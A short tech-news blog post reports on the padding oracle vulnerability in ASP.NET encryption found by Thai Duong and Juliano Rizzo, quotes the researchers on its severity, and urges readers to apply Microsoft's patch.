News

Padding Oracle Attack Affects Every ASP.NET Web Apps - Patch Now

Published: | Posted By:

There is a patch being issued this week that is supposed to fix an "Out of Band" issue with ASP.Net encryption.  The flaw has been known for several years, however back then it was used as fuel to make programmers and website architects more responsible in how they designed websites. 

However, despite how good (or bad) an ASP.Net programmer is they cannot escape this particular flaw considering the information used to exploit and root the web application is key to how ASP.Net applications run.  Namely the encrypted session keys and cookies.

Crypto isn't really my thing; however this article (and the ones it links to) is pretty good explaining the issue at hand.

"We knew ASP.NET was vulnerable to our attack several months ago, but we didn't know how serious it is until a couple of weeks ago. It turns out that the vulnerability in ASP.NET is the most critical amongst other frameworks. In short, it totally destroys ASP.NET security," said Thai Duong, who along with Juliano Rizzo, developed the attack against ASP.NET.

The pair have developed a tool specifically for use in this attack, called the Padding Oracle Exploit Tool. Their attack is an application of a technique that's been known since at least 2002, when Serge Vaudenay presented a paper on the topic at Eurocrypt. 

Funny thing is, I heard about this issue back in 2002 but it was considered a minor flaw since most examples showed that with proper use of error messages and proper application fallover you could protect yourself from the attack.

The reality is far worse

In addition, an attacker could execute this technique without waiting for the error messages by using information gained through side-channel leakages.

"It's worth noting that the attack is 100% reliable, i.e. one can be sure that once they run the attack, they can exploit the target. It's just a matter of time. If the attacker is lucky, then he can own any ASP.NET website in seconds. The average time for the attack to complete is 30 minutes. The longest time it ever takes is less than 50 minutes," Duong said. 

Needless to say, I'll be patching my systems sooner rather than later.

Related Web URL: http://threatpost.com/en_us/blogs/new-crypto-attac...

Return to Hardware Asylum News Home
Read more from Ninjalane
Hardware Reviews, News and More...